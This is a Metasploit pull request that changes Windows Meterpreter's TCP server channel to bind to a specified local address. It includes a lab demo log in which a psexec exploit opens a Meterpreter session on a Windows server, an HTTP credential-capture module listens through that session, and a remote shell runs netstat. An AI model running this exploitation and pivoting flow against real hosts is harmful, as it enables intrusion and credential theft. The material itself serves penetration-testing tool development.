### PR TITLE
Bind to the specified LocalHost

### DIFF
--- a/c/meterpreter/source/extensions/stdapi/server/net/socket/tcp_server.c
+++ b/c/meterpreter/source/extensions/stdapi/server/net/socket/tcp_server.c
@@ -19,6 +19,52 @@
 extern IN6_ADDR in6addr_any;
 #endif
 
+static int get_ai_family(const char* address) {
+	struct addrinfo* resolved_host = NULL;
+	struct addrinfo hints = {
+		.ai_family = AF_UNSPEC,
+		.ai_flags = AI_NUMERICHOST
+	};
+
+	int ai_family = AF_UNSPEC;
+	if (getaddrinfo(address, NULL, &hints, &resolved_host) == 0) {
+		ai_family = resolved_host->ai_family;
+		freeaddrinfo(resolved_host);
+	}
+	return ai_family;
+}
+
+// The inet_pton function is not available prior to Windows 8.1 so
+// use getaddrinfo.
+static int inet_pton(int af, const char* src, void* dst) {
+	struct addrinfo* resolved_host = NULL;
+	struct addrinfo hints = {
+		.ai_family = af,
+		.ai_flags = AI_NUMERICHOST
+	};
+
+	if ((af != AF_INET) && (af != AF_INET6)) {
+		return -1;
+	}
+	
+	int ai_family = AF_UNSPEC;
+	if (getaddrinfo(src, NULL, &hints, &resolved_host)) {
+		return 0;
+	}
+	if (resolved_host->ai_family != af) {  // verify the returned address is of the expected family
+		freeaddrinfo(resolved_host);
+		return 0;
+	}
+	if (af == AF_INET) {
+		memcpy(dst, &((struct sockaddr_in*)resolved_host->ai_addr)->sin_addr, sizeof(struct in_addr));
+	} else if (af == AF_INET6) {
+		memcpy(dst, &((struct sockaddr_in6*)resolved_host->ai_addr)->sin6_addr, sizeof(struct in_addr6));
+	}
+
+	freeaddrinfo(resolved_host);
+	return 1;
+}
+
 /*!
  * @brief Deallocates and cleans up the attributes of a tcp server socket context.
  * @param ctx Pointer to the context to free.
@@ -283,6 +329,7 @@ DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
 	StreamChannelOps chops = { 0 };
 	USHORT localPort = 0;
 	BOOL v4Fallback = FALSE;
+	int ai_family = AF_UNSPEC;
 
 	do
 	{
@@ -305,12 +352,28 @@ DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
 		localPort = (USHORT)(met_api->packet.get_tlv_value_uint(packet, TLV_TYPE_LOCAL_PORT) & 0xFFFF);
 		localHost = met_api->packet.get_tlv_value_string(packet, TLV_TYPE_LOCAL_HOST);
 
-		ctx->fd = WSASocket(AF_INET6, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
+		if ((localHost) && (strlen(localHost) == 0)) {
+			// normalize empty host strings
+			localHost = NULL;
+		}
+		if (localHost) {
+			ai_family = get_ai_family(localHost);
+		}
+		else {
+			ai_family = AF_INET6;
+		}
+
+		ctx->fd = WSASocket(ai_family, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
 		if (ctx->fd == INVALID_SOCKET)
 		{
-			v4Fallback = TRUE;
+			if ((ai_family == AF_INET6) && (!localHost)) {
+				// if the socket that failed to be created was IPv6 but it was only selected because not
+				// address was specified, fail back to IPv4
+				ai_family = AF_INET;
+				ctx->fd = WSASocket(ai_family, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
+			}	
 		}
-		else
+		else if (ai_family == AF_INET6)
 		{
 			int no = 0;
 			if (setsockopt(ctx->fd, IPPROTO_IPV6, IPV6_V6ONLY, (char*)&no, sizeof(no)) == SOCKET_ERROR)
@@ -319,29 +382,46 @@ DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
 				// support IPv4 and IPv6 we'd need to create two separate sockets. IPv6 on XP isn't that common
 				// so instead, we'll just revert back to v4 and listen on that one address instead.
 				closesocket(ctx->fd);
-				v4Fallback = TRUE;
+				ai_family = AF_INET;
+				ctx->fd = WSASocket(ai_family, SOCK_STREAM, IPPROTO_TCP, 0, 0, 0);
 			}
+		}
+		if (ctx->fd == INVALID_SOCKET) {
+			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSASocket failed");
 		}
 
 		struct sockaddr_in6 sockAddr = { 0 };
 		DWORD sockAddrSize = 0;
 
-		if (v4Fallback)
+		if (ai_family == AF_INET)
 		{
 			struct sockaddr_in* v4Addr = (struct sockaddr_in*)&sockAddr;
-			v4Addr->sin_addr.s_addr = localHost == NULL ? htons(INADDR_ANY) : inet_addr(localHost);
+			if (localHost) {
+				inet_pton(AF_INET, localHost, &v4Addr->sin_addr);
+			}
+			else {
+				v4Addr->sin_addr.s_addr = INADDR_ANY;
+			}
 			v4Addr->sin_family = AF_INET;
 			v4Addr->sin_port = htons(localPort);
 			sockAddrSize = sizeof(struct sockaddr_in);
 		}
-		else
+		else if (ai_family == AF_INET6)
 		{
-			// TODO: add IPv6 address binding support
-			sockAddr.sin6_addr = in6addr_any;
+			if (localHost) {
+				inet_pton(AF_INET6, localHost, &sockAddr.sin6_addr);
+			}
+			else {
+				sockAddr.sin6_addr = in6addr_any;
+			}
 			sockAddr.sin6_family = AF_INET6;
 			sockAddr.sin6_port = htons(localPort);
 			sockAddrSize = sizeof(struct sockaddr_in6);
 		}
+		else {
+			BREAK_WITH_ERROR("[TCP-SERVER] request_net_tcp_server_channel_open. bind failed, invalid address", ERROR_INVALID_PARAMETER);
+		}
+
 
 		if (bind(ctx->fd, (SOCKADDR *)&sockAddr, sockAddrSize) == SOCKET_ERROR)
 		{
@@ -364,7 +444,7 @@ DWORD request_net_tcp_server_channel_open(Remote * remote, Packet * packet)
 			BREAK_ON_WSAERROR("[TCP-SERVER] request_net_tcp_server_channel_open. WSAEventSelect failed");
 		}
 
-		ctx->ipv6 = !v4Fallback;
+		ctx->ipv6 = ai_family == AF_INET6;
 
 		memset(&chops, 0, sizeof(StreamChannelOps));
 		chops.native.context = ctx;


### PR DESCRIPTION
This  starts to normalize the behavior of how TCP server channels are opened.

This updates the Windows Meterpreter from ignoring the bind address (`localHost`) value to using it when it is specified. When it is either omitted or an empty string, the old behavior of binding to all IPv4 address and all IPv6 addresses (when available) is used. This means that a listening socket can be bound to a specific IP address on the host.

~~This also tweaks the Python Meterpreter logic to treat an empty string as if the bind address were omitted entirely. Previously, the empty string would not have been normalized to `0.0.0.0`, causing it to bind to all IPv4 addresses.~~

This relates to rapid7/metasploit-framework#17340

## Testing Steps

Note that the `portfwd` command is not useful for testing this because the LocalHost option is not passed to Meterpreter. See rapid7/metasploit-framework#17282 for more information.

- [x] Start a Windows Meterpreter
- [x] Use a server module or a payload module but those datastore options use different names
- [x] Set the `ListenerComm` to the session number
- [x] Set the `SRVHOST` to an IP address **on the remote system on which Meterpreter is running**
- [x] Run the module, see that the session is listening on the exact address that was specified.

Note that server modules may or may not allow SRVHOST to be blank. It makes sense in some contexts to allow it and not in others. This is a module-level decision and not something enforced by Meterpreter now, so testing an empty string may or may not work depending on the module.

## Demo

In this example a Windows Meterpreter session is established to a Server 2019 instance with a functioning IPv6 stack. Once established, I use the `auxiliary/server/capture/http` module and set the `ListenerComm` option to the new session. I then start the module twice, the first time to bind to `192.168.159.10:5504` and the second time to bind to `[::1]:5504`. Both binds work as they should because the addresses are available due to not conflicting with one another. Finally, I drop into the shell and use the native Windows `netstat` command to list the listening IPv4 and IPv6 sockets to see that both values are included as is expected.

```
msf6 exploit(windows/smb/psexec) > exploit

[*] Started reverse TCP handler on 192.168.159.128:4444 
[*] 192.168.159.10:445 - Connecting to the server...
[*] 192.168.159.10:445 - Authenticating to 192.168.159.10:445 as user 'smcintyre'...
[*] 192.168.159.10:445 - Selecting PowerShell target
[*] 192.168.159.10:445 - Executing the payload...
[+] 192.168.159.10:445 - Service start timed out, OK if running a command or non-service executable...
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/metsrv.x64.dll is being used
[*] Sending stage (222278 bytes) to 192.168.159.10
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_stdapi.x64.dll is being used
WARNING: Local file /home/smcintyre/.msf4/payloads/meterpreter/ext_server_priv.x64.dll is being used
[*] Meterpreter session 3 opened (192.168.159.128:4444 -> 192.168.159.10:52443) at 2022-12-07 16:49:18 -0500

meterpreter > background 
[*] Backgrounding session 3...
msf6 exploit(windows/smb/psexec) > use auxiliary/server/capture/http
msf6 auxiliary(server/capture/http) > set ListenerComm 3
ListenerComm => 3
msf6 auxiliary(server/capture/http) > set SRVHOST 192.168.159.10
SRVHOST => 192.168.159.10
msf6 auxiliary(server/capture/http) > set SRVPORT 5504
SRVPORT => 5504
msf6 auxiliary(server/capture/http) > run
[*] Auxiliary module running as background job 1.
msf6 auxiliary(server/capture/http) > 
[*] Started service listener on 192.168.159.10:5504 via the meterpreter on session 3
[*] Server started.

msf6 auxiliary(server/capture/http) > set SRVHOST ::1
SRVHOST => ::1
msf6 auxiliary(server/capture/http) > run
[*] Auxiliary module running as background job 2.
msf6 auxiliary(server/capture/http) > 
[*] Started service listener on [::1]:5504 via the meterpreter on session 3
[*] Server started.

msf6 auxiliary(server/capture/http) > sessions -i 3
[*] Starting interaction with 3...

meterpreter > shell
Process 6616 created.
Channel 3 created.
Microsoft Windows [Version 10.0.17763.3232]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32>netstat /anp TCP
netstat /anp TCP

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    0.0.0.0:22             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:88             0.0.0.0:0              LISTENING
  TCP    0.0.0.0:135            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:389            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:445            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:464            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:593            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:636            0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3268           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3269           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:3389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:5985           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:9389           0.0.0.0:0              LISTENING
  TCP    0.0.0.0:47001          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49664          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49665          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49666          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49667          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49670          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49672          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49675          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49676          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49678          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49679          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49682          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49692          0.0.0.0:0              LISTENING
  TCP    0.0.0.0:49735          0.0.0.0:0              LISTENING
  TCP    127.0.0.1:53           0.0.0.0:0              LISTENING
  TCP    192.168.159.10:53      0.0.0.0:0              LISTENING
  TCP    192.168.159.10:139     0.0.0.0:0              LISTENING
  TCP    192.168.159.10:3389    192.168.159.128:42000  ESTABLISHED
  TCP    192.168.159.10:5504    0.0.0.0:0              LISTENING
  TCP    192.168.159.10:52443   192.168.159.128:4444   ESTABLISHED

C:\Windows\system32>netstat /anp TCPv6
netstat /anp TCPv6

Active Connections

  Proto  Local Address          Foreign Address        State
  TCP    [::]:22                [::]:0                 LISTENING
  TCP    [::]:88                [::]:0                 LISTENING
  TCP    [::]:135               [::]:0                 LISTENING
  TCP    [::]:389               [::]:0                 LISTENING
  TCP    [::]:445               [::]:0                 LISTENING
  TCP    [::]:464               [::]:0                 LISTENING
  TCP    [::]:593               [::]:0                 LISTENING
  TCP    [::]:636               [::]:0                 LISTENING
  TCP    [::]:3268              [::]:0                 LISTENING
  TCP    [::]:3269              [::]:0                 LISTENING
  TCP    [::]:3389              [::]:0                 LISTENING
  TCP    [::]:5985              [::]:0                 LISTENING
  TCP    [::]:9389              [::]:0                 LISTENING
  TCP    [::]:47001             [::]:0                 LISTENING
  TCP    [::]:49664             [::]:0                 LISTENING
  TCP    [::]:49665             [::]:0                 LISTENING
  TCP    [::]:49666             [::]:0                 LISTENING
  TCP    [::]:49667             [::]:0                 LISTENING
  TCP    [::]:49670             [::]:0                 LISTENING
  TCP    [::]:49672             [::]:0                 LISTENING
  TCP    [::]:49675             [::]:0                 LISTENING
  TCP    [::]:49676             [::]:0                 LISTENING
  TCP    [::]:49678             [::]:0                 LISTENING
  TCP    [::]:49679             [::]:0                 LISTENING
  TCP    [::]:49682             [::]:0                 LISTENING
  TCP    [::]:49692             [::]:0                 LISTENING
  TCP    [::]:49735             [::]:0                 LISTENING
  TCP    [::1]:53               [::]:0                 LISTENING
  TCP    [::1]:389              [::1]:49680            ESTABLISHED
  TCP    [::1]:389              [::1]:49681            ESTABLISHED
  TCP    [::1]:389              [::1]:49688            ESTABLISHED
  TCP    [::1]:5504             [::]:0                 LISTENING
  TCP    [::1]:49680            [::1]:389              ESTABLISHED
  TCP    [::1]:49681            [::1]:389              ESTABLISHED
  TCP    [::1]:49688            [::1]:389              ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:53  [::]:0                 LISTENING
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:389  [fe80::e9cf:540e:ca7:e49d%14]:49691  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:389  [fe80::e9cf:540e:ca7:e49d%14]:49730  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:389  [fe80::e9cf:540e:ca7:e49d%14]:49733  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49667  [fe80::e9cf:540e:ca7:e49d%14]:49695  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49667  [fe80::e9cf:540e:ca7:e49d%14]:49732  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49667  [fe80::e9cf:540e:ca7:e49d%14]:49785  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49691  [fe80::e9cf:540e:ca7:e49d%14]:389  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49695  [fe80::e9cf:540e:ca7:e49d%14]:49667  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49730  [fe80::e9cf:540e:ca7:e49d%14]:389  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49732  [fe80::e9cf:540e:ca7:e49d%14]:49667  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49733  [fe80::e9cf:540e:ca7:e49d%14]:389  ESTABLISHED
  TCP    [fe80::e9cf:540e:ca7:e49d%14]:49785  [fe80::e9cf:540e:ca7:e49d%14]:49667  ESTABLISHED

C:\Windows\system32>
```